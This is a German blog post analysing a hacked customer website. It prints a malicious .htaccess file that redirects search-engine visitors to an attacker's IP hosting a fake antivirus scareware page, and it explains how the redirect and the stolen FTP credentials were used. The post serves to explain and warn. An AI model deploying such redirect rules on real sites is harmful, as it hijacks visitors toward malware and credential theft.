Fehlgeleitet: Webseiten-Schädlingsbefall

Bei einer Analyse einer Kunden-Domain fiel die .htaccess-Datei ins Auge:


RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

Sie stammt nicht vom Kunden, sondern ein Cracker hatte sich die FTP-Zugangsdaten per trojanischem Pferd vom Windows-Rechner des Kunden erschlichen. Mit diesen Zugangsdaten wurde dann obige .htaccess-Datei auf den Kunden-Webspace hochgeladen, außerdem auch einige Casino-/Porno-Links in einen <noframes>-Bereich der Webseite untergebracht.

Das perfide ist aber die .htaccess-Datei. Sie weist das Apache-Modul mod_rewrite an bei eingehenden Anforderungen an den Webserver zu prüfen, von wo der Surfer kommt (HTTP_REFERER). Hat der Surfer einen harmlosen Treffer auf einer Suchmaschinenseite angeklickt, die zu eben jener Kundenpräsenz führt, dann greifen obige Regeln: Kommt man von *oogle.*, *aol.* etc., dann greift die letzte Zeile mit der Regel (RewriteRule): Umleiten des Surfers auf die angegebene Adresse 87.248.180.89. Somit bekommt man bspw. von Google aus einen Treffer zu Brotbackautomaten, den man anklickt, landet aber nach dem Klick nicht auf der Brotbackautomaten-Seite, sondern auf der Seite des Schädlingsautors.

Dort war bisher eine Website zu finden, die in der Aufmachung an einen Virenscanner unter Windows XP erinnerte. Elemente waren so gezeichnet, dass sie wie Windows-Fenster aussahen. Dazu wurden Icons von Festplattenlaufwerken C: und D: eingeblendet und ein Fortschrittsbalken, der einen Überprüfungsvorgang der vermeintlichen Antiviren-Software aussah.

Und natürlich fand diese angebliche Überprüfung der angeblich eigenen Festplatte dann auch gleich Treffer: eine Warnmeldung schlug vor, gegen den gerade gefundenen Virus doch gleich das Gegenmittel herunterzuladen und zu starten.

Wenn man das dann getan hätte, hätte sich der Kreis geschlossen: ein weiterer PC wäre mit einem Schädling befallen gewesen, der dann im Hintergrund und unauffällig alles mit Windows hätte tun können: Tastatureingaben mitlesen und nach draußen übermitteln, als Spam-Drohne dienen (im Auftrag von anderen hätte der eigene PC dann unbemerkt Spam-Mails versandt) und/oder Teil eines Bot-Netzes zu werden.

Der Provider der Schädlingsseite hat nun den Webspace gelöscht oder abgedreht, die Seite ist nicht mehr erreichbar.

Dieser Beitrag wurde unter Internet, Sicherheit, Web abgelegt und mit , , , , verschlagwortet. Setze ein Lesezeichen auf den Permalink.

Schreibe einen Kommentar